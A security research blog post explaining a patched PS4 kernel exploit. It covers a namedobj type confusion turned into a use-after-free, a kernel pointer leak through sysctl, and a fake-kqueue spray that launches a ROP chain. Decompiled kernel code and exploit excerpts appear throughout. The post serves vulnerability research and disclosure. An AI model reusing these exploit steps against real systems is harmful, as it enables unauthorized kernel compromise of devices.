The First PS4 Kernel Exploit: Adieu

Plenty of time has passed since we first demonstrated Linux running on the PS4.

Now we will step back a bit and explain how we managed to jump from the browser process into the kernel such that ps4-kexec et al. are usable.

Over time, ps4 firmware revisions have progressively added many mitigations and in general tried to lock down the system. This post will mainly touch on vulnerabilities and issues which are not present on the latest releases, but should still be useful for people wanting to investigate ps4 security.

Vulnerability Discovery

As previously explained, we were able to get a dump of the ps4 firmware 1.01 kernel via a PCIe man-in-the-middle attack. Like all FreeBSD kernels, this image included “export symbols” - symbols which are required to perform kernel and module initialization processes. However, the ps4 1.01 kernel also included full ELF symbols (obviously an oversight as they have been removed in later firmware versions). This oversight was beneficial to the reverse engineering process, although of course not a true prerequisite. Indeed, we began exploring the kernel by examining built-in metadata in the form of the syscall handler table - focusing on the ps4-specific entries.

After recovering some of the structures, we discovered that a large portion of the ps4-specific syscalls are little more than wrappers around what is essentially a hash table API. The API exposes the following interface:

enum IDT_TYPE : u16 {
    IDT_TYPE_EPORT        = 0x0030,
    IDT_TYPE_SBLOCK       = 0x0040,
    IDT_TYPE_EVF          = 0x0110,
    IDT_TYPE_OSEM         = 0x0120,
    IDT_TYPE_BUDGET       = 0x2000,
    IDT_TYPE_NAMEDOBJ_DBG = 0x5000,
};
struct id_entry {
    struct sx *sxlock;
    char *name;
    void *ptr;
    u64 tid;
    IDT_TYPE kind;
    u16 is_open;
    u16 handle;
    u16 state;
};
struct idt_bucket {
    struct id_entry entries[128];
};
struct id_table {
    struct idt_bucket buckets[64];
    struct mtx mutex;
    u32 num_buckets;
    u32 cur_handle;
    u32 max_entries;
};
id_table *id_table_create(int max_entries);
void id_table_destroy(id_table *idt);
int id_alloc(id_table *idt, id_entry **ide);
void id_set(id_entry *ide, IDT_TYPE kind, void *data, char *name);
void id_set_open(id_entry *ide, IDT_TYPE kind, void *data, char *name);
int id_is_opened(id_entry *ide);
void id_free(id_table *idt, int handle, id_entry *ide);
void id_unlock(id_entry *ide);
void *id_rlock(id_table *idt, signed int index, IDT_TYPE kind, id_entry **ide);
void *id_rlock_name(id_table *idt, IDT_TYPE kind, char *name, id_entry **ide);
void *id_wlock(id_table *idt, signed int index, IDT_TYPE kind, id_entry **ide);

Each process object in the kernel contains its own “idt” (ID Table) object. As can be inferred from the snippet above, the hash table essentially just stores pointers to opaque data blobs, along with a given kind and name. Entries may be accessed (and thus “locked”) with either read or write intent.

Note that IDT_TYPE is not a bitfield consisting of only unique powers of 2. This means that if we can control the kind of an id_entry, we may be able to cause a type confusion to occur (it is assumed that we may control name). Sure enough, kind may be set from usermode via the namedobj_create syscall:

struct namedobj_usr_t {
    char *name;
    void *object;
    u64 field_10;
};
int sys_namedobj_create(struct thread *td, void *args) {
  MACRO_EPERM rv; // ebx
  int kind; // er14
  id_table *idt; // r12
  char *name; // r13
  namedobj_usr_t *no; // rbx
  int handle; // er15
  id_entry *ide; // [rsp+8h] [rbp-38h]
  __int64 v10; // [rsp+10h] [rbp-30h]

  rv = EINVAL;
  if ( *(_QWORD *)args ) {
    // Note this is almost completely usermode-controlled!
    kind = *((_DWORD *)args + 4) | 0x1000;
    idt = td->td_proc->sce_idt;
    name = (char *)malloc(0x20uLL, &M_NAME, 2);
    rv = copyinstr(*(const void **)args, name, 0x20uLL, 0LL);
    if ( rv ) {
      free(name, &M_NAME);
    } else {
      no = (namedobj_usr_t *)malloc(0x18uLL, &M_NAME, 2);
      no->name = name;
      no->object = *((_QWORD *)args + 1);
      handle = id_alloc(idt, &ide);
      if ( handle == -1 ) {
        free(name, &M_NAME);
        free(no, &M_NAME);
        rv = EAGAIN;
      } else {
        id_set(ide, (IDT_TYPE)kind, no, name);
        id_unlock(ide);
        td->td_retval[0] = handle;
        rv = 0;
      }
    }
  }
  return rv;
}
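
To make the reachable kind values concrete, here is a small JavaScript sketch of the kind computation from the decompilation above. The helper names effectiveKind and reachableTypes are hypothetical, and the truncation to 16 bits assumes the (IDT_TYPE) cast behaves like a plain u16 cast. The constants come straight from the enum.

```javascript
// IDT_TYPE values taken from the enum in the post.
const IDT_TYPE = {
  EPORT: 0x0030,
  SBLOCK: 0x0040,
  EVF: 0x0110,
  OSEM: 0x0120,
  BUDGET: 0x2000,
  NAMEDOBJ_DBG: 0x5000,
};

// Hypothetical helper mirroring `kind = userKind | 0x1000`, followed by the
// cast to the 16-bit IDT_TYPE when the value is handed to id_set().
function effectiveKind(userKind) {
  return (userKind | 0x1000) & 0xffff;
}

// List the enum entries that a caller can produce exactly. An entry is
// reachable only if it already has bit 0x1000 set.
function reachableTypes() {
  return Object.entries(IDT_TYPE)
    .filter(([, value]) => effectiveKind(value) === value)
    .map(([name]) => name);
}

console.log(effectiveKind(0x4000).toString(16)); // 5000
console.log(reachableTypes());
```

Under these assumptions the only named type that usermode can hit is IDT_TYPE_NAMEDOBJ_DBG, by passing 0x4000.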

Now we need to find a way to have the kernel access and improperly use an object from our process’ (i.e. the browser process) idt which has a kind of 0x1000 plus any other number of bits set. This was found in the following code:

struct namedobj_dbg_t {
    u32 field_0;
    u32 _pad_4; // compiler-inserted alignment
    u64 field_8;
    u64 field_10;
    u64 field_18;
    u64 field_20;
};
int namedobj_create_ex(id_table *idt, char *name, u32 a3, u64 a4, u64 a5,
                       u64 a6, u64 a7) {
  namedobj_dbg_t *no_exists; // rax
  int rv; // er13
  id_entry *ide_existing; // [rsp+20h] [rbp-40h]

  rv = EAGAIN;
  no_exists = (namedobj_dbg_t *)id_rlock_name(idt, IDT_TYPE_NAMEDOBJ_DBG, name,
                                              &ide_existing);
  if ( no_exists )
  {
    no_exists->field_0 = a3;
    no_exists->field_8 = a4;
    no_exists->field_10 = a5;
    no_exists->field_18 = a6;
    no_exists->field_20 = a7;
    id_unlock(ide_existing);
    rv = 0;
  }
  // ... unrelated code removed
  return rv;
}

…which is accessible from the mdbg_service syscall:

struct mdbg_service_arg1 {
    u32 field_0;
    u32 field_4;
    u64 field_8;
    u64 field_10;
    u64 field_18;
    u64 field_20;
    char name[32];
};
int sys_mdbg_service(struct thread *td, void *args) {
  signed int rv; // ebx
  void *uptr; // r14
  mdbg_service_arg1 cmd_1; // [rsp+18h] [rbp-68h]

  rv = 78; // ENOSYS
  uptr = (void *)*((_QWORD *)args + 1);
  switch ( (unsigned __int64)*(unsigned int *)args ) {
    // ... unrelated code removed
    case 1uLL:
      rv = copyin(uptr, &cmd_1, 0x48uLL);
      if ( rv )
        break;
      cmd_1.name[31] = 0;
      rv = namedobj_create_ex(
             td->td_proc->sce_idt,
             cmd_1.name,
             cmd_1.field_4,
             cmd_1.field_8,
             cmd_1.field_10,
             cmd_1.field_18,
             cmd_1.field_20);
      break;
      // ... unrelated code removed
  }
  return rv;
}

Using the combination of these syscalls, we can induce a type confusion. First, calling namedobj_create(name = "haxplz", kind = 0x1000 | 0x4000, ...) will cause the kernel to set a pointer of type namedobj_usr_t into the idt. Then, calling namedobj_create_ex(name = "haxplz", ...) will cause the kernel to access the same pointer, but cast it to type namedobj_dbg_t!
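
As a rough illustration of what the cast means in memory, the sketch below lines up the two struct layouts from the listings above and reports where each namedobj_dbg_t write lands. The function name describeOverlap is made up for this example, and the offsets assume the usual 64-bit alignment shown in the struct definitions.

```javascript
// Field layouts as [name, offset, size], taken from the structs in the post.
const namedobj_usr_t = [
  ["name", 0x00, 8],
  ["object", 0x08, 8],
  ["field_10", 0x10, 8],
];
const namedobj_dbg_t = [
  ["field_0", 0x00, 4],
  ["field_8", 0x08, 8],
  ["field_10", 0x10, 8],
  ["field_18", 0x18, 8],
  ["field_20", 0x20, 8],
];

// For each field written through namedobj_dbg_t, report which
// namedobj_usr_t field (if any) occupies the same bytes.
function describeOverlap() {
  return namedobj_dbg_t.map(([field, off, size]) => {
    const hit = namedobj_usr_t.find(
      ([, uoff, usize]) => off >= uoff && off + size <= uoff + usize
    );
    const target = hit ? `usr.${hit[0]}` : "past end of object";
    return `${field} @0x${off.toString(16)} -> ${target}`;
  });
}

describeOverlap().forEach((line) => console.log(line));
```

The first three writes land on name, object and field_10, and the last two fall outside the 0x18 bytes that were requested from malloc.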

Exploitation

To an exploiter without ps4 background, it might seem that the easiest way to exploit this bug would be to take advantage of the write off the end of the malloc’d namedobj_usr_t object. However, this turns out to be impossible (as far as I know) because of a side effect of the ps4 page size being changed to 0x4000 bytes (from the normal of 0x1000). It appears that in order to change the page size globally, the ps4 kernel developers opted to directly change the related macros. One of the many changes resulting from this is that the smallest actual amount of memory which malloc may give back to a caller becomes 0x40 bytes. While this also results in tons of memory being completely wasted, it does serve to nullify certain exploitation techniques (likely completely by accident…).
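
A back-of-the-envelope model of why the overflow goes nowhere: the sketch below assumes a malloc with power-of-two size classes, which is a simplification, and the 0x10 minimum used for comparison is an assumption about a stock kernel rather than something taken from the ps4 dump. The names allocSize and overflowBytes are hypothetical.

```javascript
// Round a request up to a power-of-two size class, never below minClass.
// Simplified model of a kernel malloc with power-of-two buckets.
function allocSize(request, minClass) {
  let size = minClass;
  while (size < request) size *= 2;
  return size;
}

const USR_SIZE = 0x18; // size requested for namedobj_usr_t
const DBG_SIZE = 0x28; // span written when treated as namedobj_dbg_t

// Number of bytes the confused write spills past the allocation.
function overflowBytes(minClass) {
  return Math.max(0, DBG_SIZE - allocSize(USR_SIZE, minClass));
}

console.log(overflowBytes(0x10)); // assumed stock minimum: 8 bytes spill
console.log(overflowBytes(0x40)); // ps4 minimum: 0 bytes spill
```

With a 0x40-byte minimum the whole 0x28-byte write stays inside the chunk backing the 0x18-byte request, so no neighbouring object gets touched.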

UAF Crafting

The way chosen to exploit this type confusion was actually to convert it into a use-after-free scenario. This was done with the help of the namedobj_delete syscall:

int sys_namedobj_delete(struct thread *td, void *args) {
  struct proc *p; // rax
  id_table *idt; // r15
  namedobj_usr_t *no; // r14
  int rv; // eax
  id_entry *id_out; // [rsp+8h] [rbp-28h]

  p = td->td_proc;
  idt = p->sce_idt;
  no = (namedobj_usr_t *)id_wlock(
                           p->sce_idt,
                           *(_DWORD *)args,
                           (IDT_TYPE)(*((_WORD *)args + 4) | 0x1000),
                           &id_out);
  rv = ESRCH;
  if ( no )
  {
    id_free(idt, *(_DWORD *)args, id_out);
    id_unlock(id_out);
    free(no->name, &M_NAME);
    free(no, &M_NAME);
    rv = 0;
  }
  return rv;
}

Note that the type confusion allows us to cast a namedobj_usr_t object to a namedobj_dbg_t one, and then update all of the namedobj_dbg_t fields. Not only does this allow us to write off the end of the actual namedobj_usr_t object, it also allows writing to the lower 32 bits of the namedobj_usr_t.name pointer, as well as all the other namedobj_usr_t fields. The fact that we may only update the lower 32 bits of namedobj_usr_t.name is actually a blessing in disguise (although it doesn’t matter so much for this post).

So, the use-after-free primitive we have allows us to free() any kernel address which happens to share the top 32 bits with no->name. This means we can have our choice of any malloc’d pointer to free - we just need to somehow find such a pointer :) Obviously, such a pointer should be able to be used in a nice way after we free it and reallocate the backing memory.
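
The pointer arithmetic behind this primitive can be sketched in a few lines. The addresses below are made up for illustration, and overwriteLow32 and canFree are hypothetical helper names. Pointers are modelled as BigInt so the 64-bit math stays exact.

```javascript
// Model the 32-bit overwrite of namedobj_usr_t.name (addresses are BigInt).
// field_0 of namedobj_dbg_t covers only the low 4 bytes of the pointer.
function overwriteLow32(namePtr, field0) {
  const high = namePtr & 0xffffffff00000000n;
  return high | (BigInt(field0) & 0xffffffffn);
}

// A target can be freed only if it shares the top 32 bits with no->name.
function canFree(namePtr, target) {
  return (namePtr >> 32n) === (target >> 32n);
}

// Example addresses, invented for this sketch.
const namePtr = 0xfffffe0012345640n;
const target = 0xfffffe00deadbe00n;

if (canFree(namePtr, target)) {
  const field0 = Number(target & 0xffffffffn);
  // After the confused write, namedobj_delete would free() this address.
  console.log(overwriteLow32(namePtr, field0).toString(16));
}
```

In this model the value passed as field_0 is simply the low half of the address we want namedobj_delete to hand to free().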

Finding a UAF Target

Since this was my first time working with FreeBSD, I just looked for some kernel object containing some function pointers which I could somehow derive the address of from the browser process. It turns out that on firmware 1.01 this is incredibly easy:

sysctlbyname("kern.file", ...)

will happily give you various kernel addresses relating to the file objects which the kernel uses to manage userspace file descriptors. From the exploit code:

constructor.prototype.getFileDescriptorKernelDataPtr = function(fd) {
    var fd_xf_data = 0;
    sys.getSysCtlByName('kern.file', function(oldp, oldlen) {
        var pid = sys.getCurrentProcessId();
        var file_size = read64(oldp).lo;
        var num_files = oldlen / file_size;
        for (var i = 0; i < num_files; i++) {
            var xf_pid = read32(oldp.plus(i * file_size + 0x08));
            var xf_fd = read32(oldp.plus(i * file_size + 0x10));
            var xf_data = read64(oldp.plus(i * file_size + 0x38));
            if (xf_pid == pid && xf_fd == fd) {
                fd_xf_data = xf_data;
                return;
            }
        }
    });
    return fd_xf_data;
}

Et voilà! A kernel file.f_data value (for an fd you control) in JavaScript. The type of the object pointed to by file.f_data depends on what type of file descriptor it is. I used kqueue as this met my goal of a target object containing function pointers. The idea will be to overwrite a kqueue and then cause one of the function pointers within kq->kq_knlist->kn_knlist to be executed, which will point to a rop chain. Note kq_knlist and kn_knlist are lists (as their names state), not standard pointers.
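
For anyone who wants to poke at the kern.file scan above without a console, here is a self-contained model that runs the same loop over a synthetic buffer. The field offsets (0x08, 0x10, 0x38) are the ones used in the excerpt. The record size of 0x80, the pids, the fds and the pointer values are all invented, and buildRecords and findFileData are hypothetical names.

```javascript
const XF_PID = 0x08, XF_FD = 0x10, XF_DATA = 0x38; // offsets from the excerpt

// Build a fake kern.file buffer. recordSize is an arbitrary illustrative value.
function buildRecords(entries, recordSize) {
  const view = new DataView(new ArrayBuffer(entries.length * recordSize));
  entries.forEach((e, i) => {
    const base = i * recordSize;
    view.setBigUint64(base, BigInt(recordSize), true); // size of one record
    view.setUint32(base + XF_PID, e.pid, true);
    view.setInt32(base + XF_FD, e.fd, true);
    view.setBigUint64(base + XF_DATA, e.data, true);
  });
  return view;
}

// Same scan as the excerpt: stride by the size stored in the first record.
function findFileData(view, pid, fd) {
  if (view.byteLength < 8) return 0n;
  const recordSize = Number(view.getBigUint64(0, true));
  if (recordSize === 0) return 0n;
  for (let base = 0; base + recordSize <= view.byteLength; base += recordSize) {
    if (view.getUint32(base + XF_PID, true) === pid &&
        view.getInt32(base + XF_FD, true) === fd) {
      return view.getBigUint64(base + XF_DATA, true);
    }
  }
  return 0n; // not found
}

const view = buildRecords(
  [{ pid: 10, fd: 3, data: 0xfffffe0011110000n },
   { pid: 42, fd: 7, data: 0xfffffe0022220000n }],
  0x80
);
console.log(findFileData(view, 42, 7).toString(16));
```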

Putting it Together

Another exploit excerpt:

// finalize the ropchain and invoke it
constructor.prototype.trigger_kqueue = function() {
    var fakefd = callFunc(syms.libkernel.kqueue).lo;
    var filep = this.leaks.getFileDescriptorKernelDataPtr(fakefd);

    var rop_scratch_len = 0;
    var data_buf_len = this.kqueue_sizeof + this.klist_sizeof + this.knote_sizeof +
        this.filterops_sizeof + this.knlist_sizeof + this.jmpbuf_sizeof +
        rop_scratch_len;
    var data_buf = allocateGCMemory(data_buf_len);
    clearMemory(data_buf, data_buf_len);

    var fakekq      = data_buf;
    var kl          = fakekq.plus(this.kqueue_sizeof);
    var kn          = kl.plus(this.klist_sizeof);
    var fop         = kn.plus(this.knote_sizeof);
    var knl         = fop.plus(this.filterops_sizeof);
    var jmpbuf      = knl.plus(this.knlist_sizeof);
    var rop_scratch = jmpbuf.plus(this.jmpbuf_sizeof);

    // finalize ropchain
    this.emitReturnViaJmpbuf(jmpbuf);

    // create fake kq to execute the ropchain
    var rop_stack = this.rop.getRopStack();
    write64(jmpbuf.plus(0x48), rop_scratch);   // rdi
    write64(jmpbuf.plus(0x60), 0);             // rcx (why?)
    write64(jmpbuf.plus(0xe0), gadgets.ret);   // next rip
    write64(jmpbuf.plus(0xf8), rop_stack);     // rsp

    // longjmp_tail needs at least 1 stack slot to push next rip onto
    write64(knl.plus(0x08), gadgets.ret);           // kl_lock
    write64(knl.plus(0x10), gadgets.longjmp_tail);  // kl_unlock
    write64(knl.plus(0x18), gadgets.ret);           // kl_assert_locked
    write64(knl.plus(0x20), gadgets.ret);           // kl_assert_unlocked
    write64(knl.plus(0x28), jmpbuf);                // kl_lockarg (passed as
                                                    // rdi to the above funcptrs)

    write32(fop, 1);                        // f_isfd = 1
    write64(fop.plus(0x18), gadgets.ret0);  // f_event = {ret 0}

    write64(kn.plus(0x10), knl);                // kn_knlist
    write32(kn.plus(0x38), this.EVFILT_READ);   // kn_filter = EVFILT_READ (16bit)
    write32(kn.plus(0x50), 2);                  // kn_status = KN_QUEUED
    write64(kn.plus(0x68), fop);                // kn_fop

    write64(kl, kn); // slh_first = &kn

    this.writeFakeMtx(fakekq.plus(0));  // kq_lock
    write32(fakekq.plus(0xa4), 1);      // kq_knlistsize = 1
    write64(fakekq.plus(0xa8), kl);     // kq_knlist = &kl

    var change = allocateGCMemory(this.kevent_sizeof);
    clearMemory(change, this.kevent_sizeof);
    write32(change.plus(8), this.EVFILT_READ);

    // free, try to fill the buffer, then cause it to be used
    this.kernelFree(filep);
    this.ioctlSpray(fakekq, this.kqueue_sizeof);
    callFunc(syms.libkernel.kevent, fakefd, change, 1, 0, 0, 0);

    // safe as long as injected code has fixed the corrupted kqueue
    callFunc(syms.libkernel.close, fakefd);
}

The excerpt above builds a fake kqueue object in userspace, which is then sprayed into the kernel simply by calling ioctl() with it, right after our UAF primitive (kernelFree()) has freed the real one. After the spray, calling kevent() on the fd backed by our corrupted file object makes the kernel walk the fake kqueue to our fake knlist and call its kl_unlock function pointer, which kicks off execution of the ROP chain.
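
The way the fake objects are packed back to back in one buffer can be sketched as follows. The sizes here are placeholders chosen for the example and are not the real ps4 structure sizes. The helper name layout is hypothetical.

```javascript
// Lay out consecutive regions in one buffer and return each region's offset.
function layout(regions) {
  const offsets = {};
  let cursor = 0;
  for (const [name, size] of regions) {
    offsets[name] = cursor;
    cursor += size;
  }
  offsets.total = cursor;
  return offsets;
}

// Placeholder sizes, NOT the real structure sizes.
const off = layout([
  ["fakekq", 0x100],
  ["kl", 0x08],
  ["kn", 0x80],
  ["fop", 0x20],
  ["knl", 0x30],
  ["jmpbuf", 0x100],
]);

// Pointer chain set up by the excerpt, in terms of these regions:
//   fakekq.kq_knlist -> kl, kl.slh_first -> kn,
//   kn.kn_knlist -> knl, kn.kn_fop -> fop, knl.kl_lockarg -> jmpbuf
console.log(off);
```

Only the first region (the fake kqueue itself) gets sprayed into the kernel. Everything it points to stays in the userspace buffer.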

Cleaning Up

Since this exploit leaves a corrupted file object in the browser’s file descriptor table, the first thing for the kernel payload to do is actually to remove that corruption. Otherwise, the kernel will eventually panic (normally while iterating the process’ file descriptor table in an attempt to close() all of them). This can easily be done with the following:

void fix_corrupted_kqueue(struct thread *td) {
    // This method prevents the kernel from crashing (most of the time), but
    // the process will sigsegv when exiting.
    // blog note:
    //   I actually no longer remember if the above comment is true.
    //   I always kexec directly to linux so it doesn't matter to me :)
    struct filedesc *fdp = td->td_proc->p_fd;
    for (int fd = 0; fd < fdp->fd_nfiles; fd++) {
        struct file *fp = fdp->fd_ofiles[fd];
        if (fp && fp->f_type == DTYPE_KQUEUE) {
            struct kqueue *kq = fp->f_data;
            if ((uintptr_t)kq->kq_knlist < VM_USER_MAX) {
                // found the bad one...kill it
                SLIST_REMOVE(&fdp->fd_kqlist, kq, kqueue, kq_list);
                fdp->fd_ofiles[fd] = NULL;
                fdp->fd_ofileflags[fd] = 0;
                return;
            }
        }
    }
}
...
fix_corrupted_kqueue(curthread());

Adieu

The namedobj vulnerability was present and exploitable (albeit using a slightly different method than described here) until it was fixed in firmware version 4.06. This vulnerability was also found and exploited by (at least) Chaitin Tech, so props to them! Taking a quick look at the 4.07 kernel, we can see a straightforward fix (4.06 is assumed to be identical - only had 4.07 on hand while writing this post):

int sys_namedobj_create(struct thread *td, void *args) {
  // ...
  rv = EINVAL;
  kind = *((_DWORD *)args + 4);
  if ( !(kind & 0x4000) && *(_QWORD *)args ) {
    // ... (unchanged)
  }
  return rv;
}
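
A quick way to convince yourself that the check closes the hole is to brute-force every 16-bit kind against both versions. This sketch assumes the elided "unchanged" part still ORs in 0x1000 and casts to 16 bits as before. The function names are hypothetical.

```javascript
const IDT_TYPE_NAMEDOBJ_DBG = 0x5000;

// Model of the old behaviour: any user-supplied kind is accepted.
function kindBeforeFix(userKind) {
  return (userKind | 0x1000) & 0xffff;
}

// Model of the 4.07 check: kinds with bit 0x4000 set are rejected
// (null stands in for the EINVAL return).
function kindAfterFix(userKind) {
  if (userKind & 0x4000) return null;
  return (userKind | 0x1000) & 0xffff;
}

// Try every 16-bit input and see whether the debug type can be produced.
function canReachDbgType(kindFn) {
  for (let k = 0; k <= 0xffff; k++) {
    if (kindFn(k) === IDT_TYPE_NAMEDOBJ_DBG) return true;
  }
  return false;
}

console.log(canReachDbgType(kindBeforeFix)); // true
console.log(canReachDbgType(kindAfterFix));  // false
```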

And so we say goodbye to a nice exploit.

I hope you enjoyed this blast from the past :)
Keep hacking!